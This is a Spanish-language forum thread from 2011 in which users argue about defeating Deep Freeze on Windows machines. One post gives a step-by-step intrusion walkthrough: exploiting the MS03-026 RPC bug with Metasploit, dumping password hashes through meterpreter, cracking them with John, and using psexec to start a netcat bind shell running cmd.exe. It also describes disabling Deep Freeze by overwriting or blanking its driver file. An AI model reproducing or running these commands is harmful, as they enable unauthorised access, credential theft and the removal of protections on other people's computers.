offtopic// pysmera alavez eres el amo y el dueño del mundo y eres un todo bn y gran programer pero a la vez puede llegar a ser un poco atacante xDDDDD

error mi doctor watson la cosa tan facil como tu la pintas tampoco es tan dificilPsymera escribió: exelente broma
simplemente esperan usuarios normales no hackers
por ke todo es tan faicl como elevar privilegios con el bug de rpc o algun 0dayz y desactivas todo facil
en el msn ♣Conejo escribió:[26/03/11 10:39:13] Su firma contiene 281 caracteres. El máximo número de caracteres permitidos es 200.
menos mal que soy admin
error tuyo mi estimada paletaFroZenFeW escribió:error mi doctor watson la cosa tan facil como tu la pintas tampoco es tan dificilPsymera escribió: exelente broma
simplemente esperan usuarios normales no hackers
por ke todo es tan faicl como elevar privilegios con el bug de rpc o algun 0dayz y desactivas todo facil
msrpc_dcom_ms03_026 funcionaria si y solo si no esta parcheado y si no lo esta pongamoslo de ejemplo en este caso
supongamos que el equipo no es administrador y solo tiene deep freeze de proteccion si llegaras a tener una shell con el
rpc no obtendrias de una vez privilegios tendrias que hacer unos pasos y se los dejo para los que quieran aprender
cuando obtienes la shell y el usuario no tiene privilegios debes regresar al meterpreter
usar file system library, sam library, process library para los que estan aprendiendo los comandos son
use -M Fs
use -M Sam
use -M Process¿porque? en este caso usaremos :
file system se utilizara para subir archivos al "remoto" llamemoslo asi
sam library se utilizará para extraer del "remoto" los hashs de las contraseña de los usuarios
process library se utiliza para ejecutar comandos interactivo en el "remoto"
seguimos con nuestra asaña para obtener privilegios subiremos netcat, psexec y whoami muchas personas tienen su estilo este es el mio
como vamos a obtener privilegios usare nc para crear una puerta trasera y psexec para ejecutar netcat en una cuenta de administrador y whoami lo usaremos para saber nuestro usuario actual
en el meterpreter vamos a obtener los hashes de las cuentas recuerden que para ejecutar nc en una cuenta de administrador necesitamos el password de tal
obtenemos los hashes
gethashes
supongamos admin 01010100101010101011010010101001010
con el amigo jonh crackeamos y la clave es 1234
ya tenemos la cuenta admin ahora interactuamos con el remoto con la shell
como subimos psexec y nc
pues solo falta
psexec.exe \\127.0.0.1 -u admin -p 1234 nc.exe -l -d -e cmd.exe -p 4000 /*no lo explico ya toy cansao pero es entendible*/
solo falta entrar por telnet y le damos whoami y ya esta somos apenas administradores xDDDDDDDDD
ya falta el del relog y obtenemos system
ahora del exploit 0day o es un exploit a deep freeze o tas muerto xD
si me tocara hacer esto y me dan un minuto con backtrack solo le cambio el persi0.sys que es donde guarda el pass y si no funka me voy a la carpeta drivers
copio null.sys a Deepfrz.sys
y los comparo
diff ./null.sys ./deepfrz.sys
si son iguales reinicio y me carga windoors sin deep XDDD
me canse xD me gane los 10000 (?)
jajajaj como te dije antes entra con el rpc en un usuario sin privilegios y hazle al menos type loquesea.txtcuando entrarias a simbolo de sistema y tan facil como echo '' > deepfrz.sys
es mas si estas jugando con cosas como metasploit
en el msn ♣Conejo escribió:[26/03/11 10:39:13] Su firma contiene 281 caracteres. El máximo número de caracteres permitidos es 200.
menos mal que soy admin
la neta no mames por ke me vengoFroZenFeW escribió:@psymera recuerdas un poco mal aunque si le haces whoami saldra que eres NT/AUTHORITY SYSTEM pero si el usuario no tiene privilegios intenta abrir un archivo de texto XDDDD
tal cual como lo dices no es un ids es un sandbox
si le trataras de explotar you won obtienes una shell pero reinicia XDD o la verdad no se
como tu dices que crear un 0day es tan facil como ir a la warner y pedirle un autografo a bugs bunny
con respecto al metas di un ejemplo y dije que si dejaban mas no estoy compitiendo por las olimpiadasjajajaj como te dije antes entra con el rpc en un usuario sin privilegios y hazle al menos type loquesea.txtcuando entrarias a simbolo de sistema y tan facil como echo '' > deepfrz.sys
es mas si estas jugando con cosas como metasploit
te saldra access is denied
jajajaj y con que me vienes a decir tu que esos pasos se hacen si soy admin jajajajajajaja jajajaja dale aqui tu eres el pentester
en el msn ♣Conejo escribió:[26/03/11 10:39:13] Su firma contiene 281 caracteres. El máximo número de caracteres permitidos es 200.
menos mal que soy admin
Volver a “Mensajes Entre Nosotros”